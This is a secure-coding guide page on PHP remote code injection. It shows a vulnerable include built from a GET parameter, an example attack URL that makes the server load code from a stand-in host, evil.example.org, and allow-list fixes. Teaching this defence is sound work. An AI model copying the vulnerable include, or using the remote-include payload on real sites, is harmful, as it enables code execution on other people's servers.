Remote code injection
A remote code injection attack occurs when an attacker is able to execute PHP code.
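// Vulnerable: the request parameter is interpolated straight into the include path.
// allow_url_include lets include/require load URLs (it is off by default).
ini_set("allow_url_include", 1);
include "{$_GET['section']}/data.inc.php";
// http://example.org/?section=evil.example.org/attack.php
// include "http://evil.example.org/attack.php?data.inc.php"; // Look Here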
Protection
Filter all input and never use tainted data in an include or require.
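// Setting kept from the example above; the allow-list below does not depend on it.
ini_set("allow_url_include", 1);
$sections = array('home', 'news', 'photos', 'blog');
// A missing parameter becomes '' instead of raising an undefined-index notice.
$requested = $_GET['section'] ?? '';
// Strict comparison: only an exact string match against a known section is used.
$section = in_array($requested, $sections, true) ? $requested : 'home';
include "$section/data.inc.php";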
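The allow-list check above, extended as an added example (not code from the original page): it also rejects non-string input such as `?section[]=news` and confirms the resolved file sits inside the section directory before it is included. The names `resolveSection` and `SECTIONS` and the temporary directory layout are assumptions, and the code assumes PHP 8.0 or later.

```php
<?php
declare(strict_types=1);

// Added example; function and constant names are hypothetical.
const SECTIONS = ['home', 'news', 'photos', 'blog'];

function resolveSection(mixed $requested, string $baseDir): string
{
    // Request values can be arrays or missing; only an exact string match counts.
    $section = (is_string($requested) && in_array($requested, SECTIONS, true))
        ? $requested
        : 'home';

    // Defence in depth: the file must exist and resolve to a path under $baseDir
    // (catches a section directory that is a symlink pointing elsewhere).
    $base = realpath($baseDir);
    $path = realpath("$baseDir/$section/data.inc.php");
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        throw new RuntimeException("No section file for '$section'");
    }
    return $path;
}

// Constructed demo: build a throwaway section tree, then resolve sample inputs.
$base = sys_get_temp_dir() . '/sections_' . bin2hex(random_bytes(4));
foreach (SECTIONS as $name) {
    mkdir("$base/$name", 0700, true);
    file_put_contents("$base/$name/data.inc.php", "<?php return '$name data';");
}

$samples = [
    'news',                         // allowed section
    'evil.example.org/attack.php',  // value from the page's example URL
    'News',                         // near miss: matching is case-sensitive
    ['news'],                       // ?section[]=news arrives as an array
    null,                           // parameter missing
];
foreach ($samples as $input) {
    $data = include resolveSection($input, $base);
    printf("%-32s => %s\n", json_encode($input, JSON_UNESCAPED_SLASHES), $data);
}

// Remove the constructed files again.
foreach (SECTIONS as $name) {
    unlink("$base/$name/data.inc.php");
    rmdir("$base/$name");
}
rmdir($base);
```

Only the first sample resolves to its own section; every other input falls back to `home`, so no request value ever reaches the include path.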
Last update: 34 days ago